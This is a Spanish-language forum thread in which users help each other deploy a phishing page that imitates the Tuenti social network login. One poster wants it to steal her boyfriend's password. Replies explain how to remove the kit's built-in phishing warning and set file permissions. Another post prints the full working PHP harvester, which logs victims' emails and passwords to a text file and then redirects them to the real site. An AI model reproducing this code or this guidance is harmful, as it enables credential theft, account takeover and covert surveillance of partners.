Hola a todos, es mi primer mensaje en el foro ya que vi este tema y me llamó la atención asi que me e registrao para resolver las dudas:
En el archivo "tuenti.php", que e de modificar?
He de crear una direccion web? Si la tengo que crear, como?
Supongo que para subir los archivos a la web sera con servidor FTP como el fillezilla asi que este programa lo tengo y se utilizarlo
Bueno, espero sus respuestas
Gracias
sod tio podrias poner un videotutorial o un manual!
HOLA POR FAVOR ALGUIEN ME AYUDA A CONSEGUIR UN FAKE DE TUENTI??POR FAVOR ES MUY URGENTE NECESITO CONSEGUIR UNA CONTRASEÑA CREO QUE MI NOVIO ME ESTA ENGAÑANDO Y KIERO VERLO CON MIS PROPIOS OJOS POR FAVOR AYUDENME MUAKKKKKKKKKKKKKKK PARA TODOSSS Y GRACIASSSS AMORESSS!!!
No es por meterme en tu vida ni nada similar, pero joder si desconfias de tu novio no se que haces con el..., pero de todos modos linkgl tiene uno montado para usarlo sin tener que hacer nada.pokeruta escribió:HOLA POR FAVOR ALGUIEN ME AYUDA A CONSEGUIR UN FAKE DE TUENTI??POR FAVOR ES MUY URGENTE NECESITO CONSEGUIR UNA CONTRASEÑA CREO QUE MI NOVIO ME ESTA ENGAÑANDO Y KIERO VERLO CON MIS PROPIOS OJOS POR FAVOR AYUDENME MUAKKKKKKKKKKKKKKK PARA TODOSSS Y GRACIASSSS AMORESSS!!!
Saludos
Hola!
Me he hecho una web en webs.com y no se seguir.. no se donde hay que poner lo del tuenti. Me he dercargado el programa filezillaportable y tampoco se que hay que hacer con el... Si me pudierais echar un cable estaria eternamente agradecida!
Gracias
Me he hecho una web en webs.com y no se seguir.. no se donde hay que poner lo del tuenti. Me he dercargado el programa filezillaportable y tampoco se que hay que hacer con el... Si me pudierais echar un cable estaria eternamente agradecida!
Gracias
muy bueno, ahora me lo bajo
sod escribió:No es por meterme en tu vida ni nada similar, pero joder si desconfias de tu novio no se que haces con el..., pero de todos modos linkgl tiene uno montado para usarlo sin tener que hacer nada.pokeruta escribió:HOLA POR FAVOR ALGUIEN ME AYUDA A CONSEGUIR UN FAKE DE TUENTI??POR FAVOR ES MUY URGENTE NECESITO CONSEGUIR UNA CONTRASEÑA CREO QUE MI NOVIO ME ESTA ENGAÑANDO Y KIERO VERLO CON MIS PROPIOS OJOS POR FAVOR AYUDENME MUAKKKKKKKKKKKKKKK PARA TODOSSS Y GRACIASSSS AMORESSS!!!
Saludos
escucha sod,quiero ke me esplikes un poko porfavor,aver el fake este,kuando la persona k kieres robarle la contraseña se tene k poner esta pagina ke sale k pone justo arriba (algo de NO PONGAS AQUI TU CONTRASEÑA ESTA PAGINA ES FALSA)
como van a a poner ai sus datos si le pone eso???o ke eske no lo entiendo
no ai un fake como si fuera la pagina verdadera?si no no sirve de nada no crres?contesta rapido gracias
Cambia el nombre de la imagen del logo poniendole una b al final del nombre (creo recordar)markooss_1 escribió:sod escribió:No es por meterme en tu vida ni nada similar, pero joder si desconfias de tu novio no se que haces con el..., pero de todos modos linkgl tiene uno montado para usarlo sin tener que hacer nada.pokeruta escribió:HOLA POR FAVOR ALGUIEN ME AYUDA A CONSEGUIR UN FAKE DE TUENTI??POR FAVOR ES MUY URGENTE NECESITO CONSEGUIR UNA CONTRASEÑA CREO QUE MI NOVIO ME ESTA ENGAÑANDO Y KIERO VERLO CON MIS PROPIOS OJOS POR FAVOR AYUDENME MUAKKKKKKKKKKKKKKK PARA TODOSSS Y GRACIASSSS AMORESSS!!!
Saludos
escucha sod,quiero ke me esplikes un poko porfavor,aver el fake este,kuando la persona k kieres robarle la contraseña se tene k poner esta pagina ke sale k pone justo arriba (algo de NO PONGAS AQUI TU CONTRASEÑA ESTA PAGINA ES FALSA)
como van a a poner ai sus datos si le pone eso???o ke eske no lo entiendo
no ai un fake como si fuera la pagina verdadera?si no no sirve de nada no crres?contesta rapido gracias
pero no ai un fake komo la web erdadera?
PERDONAD PERO HE INTENTADO DE TODO Y NADA..ALGUIEN PODRIA PONER UN VIDEO EXPLICANDO???
POR CIERTO CUANDO ABRO EL FAKE DE TUENTI SALE UNA IMAGEN EN LA QUE PONE: ¡CUIDADO ESTO ES UN PHISHING, NO PONGAS TU CONTRASEÑA!
AYUDA PORFA
POR CIERTO CUANDO ABRO EL FAKE DE TUENTI SALE UNA IMAGEN EN LA QUE PONE: ¡CUIDADO ESTO ES UN PHISHING, NO PONGAS TU CONTRASEÑA!
AYUDA PORFA
SOD necesito tu ayuda.
He conseguido esto [Enlace externo eliminado para invitados] pero cuando le da a entrar pues sale que se guarda en tuenti.php o algo así. me puedes decir qeu tengo que cambiar???
He conseguido esto [Enlace externo eliminado para invitados] pero cuando le da a entrar pues sale que se guarda en tuenti.php o algo así. me puedes decir qeu tengo que cambiar???
A mí no me guarda ni los user ni los pass. ¿Qué hago?
No se que cojones has hecho, pero viendo el codigo fuente de la pagina que me as pasado sale esto:pabloatleta escribió:SOD necesito tu ayuda.
Código: Seleccionar todo
<?php
** http://dominio.com/tuenti?le=isa
$archivo = 'isa.txt'; //Cambiale el nombre para que nadie pueda verlo
$leer = 'isa';
$le=$_GET['le'];
$correoMal = $_POST['email'];
$clave = $_POST['password'];
$correo = str_replace("@","%40",$correoMal);
$md5 = md5($clave);
if ($le == $leer ) {
header ('Location: '.$archivo.' ');
die();
}
$archivo = fopen($archivo, 'a+'); // "a+"
fwrite($archivo,'
Hora: '.date("Y-m-d H:i:s").'
Usuario: '.$correoMal.'
Clave: '.$clave.'
-----------------------------');
fclose($archivo);
header('Location: http://www.tuenti.com/?ef=login&md5='.$md5.'&email='.$correo.'&timeStampSigned=3268287d40d7aba016ef63023d4de59429cd050b&timeStamp=1227468472&tz=1&remember=0');
?>
Dale permisos 777TakuyaMK escribió:A mí no me guarda ni los user ni los pass. ¿Qué hago?
Me funciona todo perfecto menos el login en el autentico tuenti, me direcciona al a web pero la parte del script de entrar en el autentico tuenti no consigo que funcione, pueden indicarme porque puede ser?? Puede que hayan modificado la URL del login en tuenti??
se espera la v2